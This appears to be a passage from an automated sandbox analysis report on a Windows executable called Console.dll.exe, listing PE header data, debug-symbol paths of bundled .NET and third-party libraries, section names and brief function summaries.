            Source: Console.dll.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Console.dll.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Console.dll.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Console.dll.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Console.dll.exe, 00000000.00000002.1631558379.0000000009C02000.00000002.00000001.01000000.00000014.sdmp, Console.dll.exe, 00000007.00000002.2003149476.0000000009252000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: System.Net.Sockets.ni.pdb source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: SQLitePCLRaw.core.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: System.Security.Cryptography.ProtectedData.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Pipes.AccessControl\Release\net8.0-windows\System.IO.Pipes.AccessControl.pdb source: System.IO.Pipes.AccessControl.dll.0.dr
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: System.Runtime.InteropServices.RuntimeInformation.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\Release\net8.0\System.Xml.XmlSerializer.pdb source: System.Xml.XmlSerializer.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdb source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net8.0-windows/Microsoft.VisualBasic.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: System.Reflection.Emit.Lightweight.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Permissions/netcoreapp3.0-Release/System.Security.Permissions.pdbSHA256 source: System.Security.Permissions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdbSHA256Y source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA2567 source: System.Reflection.Emit.Lightweight.dll.0.dr
            Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1630061782.00000000095C2000.00000002.00000001.01000000.00000012.sdmp, Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmp, netstandard.dll.0.dr
            Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.TypeExtensions\Release\net8.0\System.Reflection.TypeExtensions.pdb source: System.Reflection.TypeExtensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1630204693.0000000009612000.00000002.00000001.01000000.00000007.sdmp, Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1634300622.000000000C512000.00000002.00000001.01000000.00000029.sdmp, Console.dll.exe, 00000007.00000002.2006961538.000000000BF12000.00000002.00000001.01000000.00000029.sdmp
            Source: Binary string: System.Net.Security.ni.pdb source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdbSHA256x source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: System.ObjectModel.ni.pdb source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x86\Release\System.Private.CoreLib.pdb source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: Console.dll.exe, Console.dll.exe.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Console.dll.exe, 00000000.00000002.1631801024.0000000009C42000.00000002.00000001.01000000.0000001A.sdmp, Console.dll.exe, 00000007.00000002.2003908860.0000000009472000.00000002.00000001.01000000.0000001A.sdmp, System.Diagnostics.Tracing.dll.0.dr
            Source: Binary string: System.Diagnostics.TextWriterTraceListener.ni.pdb source: System.Diagnostics.TextWriterTraceListener.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Resources.ResourceManager/Release/net8.0-windows/System.Resources.ResourceManager.pdbSHA256=l source: System.Resources.ResourceManager.dll.0.dr
            Source: Binary string: System.Collections.ni.pdb source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmp, Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: System.Private.CoreLib.ni.pdb source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: /_/artifacts/obj/System.Dynamic.Runtime/Release/net8.0-windows/System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.0.dr
            Source: Binary string: System.Runtime.InteropServices.ni.pdb.MRH source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256;z source: System.Security.Cryptography.ProtectedData.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA256{) source: Console.dll.exe, 00000000.00000002.1629588247.0000000009532000.00000002.00000001.01000000.00000010.sdmp, Console.dll.exe, 00000007.00000002.2002494018.0000000009192000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: System.Private.Uri.ni.pdb1 source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdb source: System.Reflection.Extensions.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdbSHA256 source: System.Reflection.Extensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\Release\net8.0-windows\Microsoft.CSharp.pdb source: Console.dll.exe, Microsoft.CSharp.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Console.dll.exe, 00000000.00000002.1645066855.000000006CBA1000.00000020.00000001.01000000.0000000F.sdmp, Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmp, System.Threading.dll.0.dr
            Source: Binary string: System.Reflection.TypeExtensions.ni.pdb source: System.Reflection.TypeExtensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebSockets\Release\net8.0-windows\System.Net.WebSockets.pdb source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1631558379.0000000009C02000.00000002.00000001.01000000.00000014.sdmp, Console.dll.exe, 00000007.00000002.2003149476.0000000009252000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: System.Runtime.InteropServices.RuntimeInformation.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: System.IO.Compression.ni.pdbU source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TextWriterTraceListener\Release\net8.0\System.Diagnostics.TextWriterTraceListener.pdb source: System.Diagnostics.TextWriterTraceListener.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256{) source: Console.dll.exe, 00000000.00000002.1634238960.000000000C502000.00000002.00000001.01000000.00000028.sdmp, Console.dll.exe, 00000007.00000002.2006811873.000000000BD42000.00000002.00000001.01000000.00000028.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.IO.UnmanagedMemoryStream/Release/net8.0-windows/System.IO.UnmanagedMemoryStream.pdb source: System.IO.UnmanagedMemoryStream.dll.0.dr
            Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: Console.dll.exe, 00000000.00000002.1630061782.00000000095C2000.00000002.00000001.01000000.00000012.sdmp, Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmp, netstandard.dll.0.dr
            Source: Binary string: Microsoft.Win32.Registry.ni.pdb} source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: C:\Users\Gaming\source\repos\Console\Console\obj\Release\net8.0\win-x86\Console.pdb source: Console.dll.exe
            Source: Binary string: System.Linq.Expressions.ni.pdb{ source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: Console.dll.exe
            Source: Binary string: System.Net.NameResolution.ni.pdb source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdb source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.Serialization/Release/net8.0-windows/System.Runtime.Serialization.pdb source: System.Runtime.Serialization.dll.0.dr
            Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdbg source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: Microsoft.VisualBasic.Core.ni.pdbz source: Console.dll.exe
            Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: System.Threading.ni.pdb source: Console.dll.exe, 00000000.00000002.1645066855.000000006CBA1000.00000020.00000001.01000000.0000000F.sdmp, Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmp, System.Threading.dll.0.dr
            Source: Binary string: System.Threading.Tasks.Parallel.ni.pdb source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdb source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net8.0-windows/System.Configuration.pdbSHA256> source: System.Configuration.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdbSHA2562aj source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: System.Net.Sockets.ni.pdbX^ source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: Console.dll.exe
            Source: Binary string: System.Security.Cryptography.ni.pdb, source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Algorithms/Release/net8.0-windows/System.Security.Cryptography.Algorithms.pdbSHA256 source: System.Security.Cryptography.Algorithms.dll.0.dr
            Source: Binary string: C:\Users\Gaming\source\repos\Console\Console\obj\Release\net8.0\win-x86\Console.pdbSHA256 source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdbSHA256 source: Console.dll.exe, System.Buffers.dll.0.dr
            Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Parallel\Release\net8.0\System.Threading.Tasks.Parallel.pdb source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: System.Net.Security.ni.pdb= source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: System.ObjectModel.ni.pdb^ source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: Microsoft.CSharp.ni.pdb source: Console.dll.exe, Microsoft.CSharp.dll.0.dr
            Source: Binary string: System.Text.Encodings.Web.ni.pdb source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebSockets\Release\net8.0-windows\System.Net.WebSockets.pdbSHA256 source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: System.Collections.Concurrent.ni.pdb source: Console.dll.exe
            Source: Binary string: C:\projects\websocket-sharp\websocket-sharp\obj\Release\netstandard2.0\websocket-sharp.pdb source: Console.dll.exe, 00000000.00000002.1629988218.0000000009582000.00000002.00000001.01000000.00000011.sdmp, Console.dll.exe, 00000007.00000002.2002778673.00000000091D2000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: System.Diagnostics.Process.ni.pdb source: Console.dll.exe, 00000000.00000002.1645294849.000000006CBF1000.00000020.00000001.01000000.0000000A.sdmp, Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Console.dll.exe, 00000000.00000002.1647079139.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, Console.dll.exe, 00000007.00000002.2013767303.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, System.ComponentModel.Primitives.dll.0.dr
            Source: Binary string: System.Private.Uri.ni.pdb source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net8.0-windows/Microsoft.VisualBasic.pdbSHA256^ source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Resources.ResourceManager/Release/net8.0-windows/System.Resources.ResourceManager.pdb source: System.Resources.ResourceManager.dll.0.dr
            Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmp, Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: System.IO.Compression.ZipFile.ni.pdb source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net8.0-windows\Microsoft.VisualBasic.Core.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net8.0-windows/System.Configuration.pdb source: System.Configuration.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\Release\net8.0\System.Xml.XmlSerializer.pdbSHA256 source: System.Xml.XmlSerializer.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Pipes.AccessControl\Release\net8.0-windows\System.IO.Pipes.AccessControl.pdbSHA256 source: System.IO.Pipes.AccessControl.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256;s source: Console.dll.exe, 00000000.00000002.1634148967.000000000C4E2000.00000002.00000001.01000000.00000026.sdmp, Console.dll.exe, 00000007.00000002.2006569993.000000000BD12000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: System.Linq.Expressions.ni.pdb source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Console.dll.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Console.dll.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Console.dll.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Console.dll.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Console.dll.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: System.Runtime.Intrinsics.dll.0.dr Static PE information: 0xCFC90A77 [Wed Jun 19 21:45:27 2080 UTC]
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_0141B5D0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary,GetCurrentProcess,VirtualFree,VirtualFree,GetCurrentProcess,VirtualFree,GetCurrentProcess,VirtualProtect,0_2_0141B5D0
            Source: Console.dll.exe Static PE information: section name: .CLR_UEF
            Source: Console.dll.exe Static PE information: section name: .didat
            Source: Console.dll.exe Static PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_05AA8770 pushfd ; iretd 0_2_05AA8771
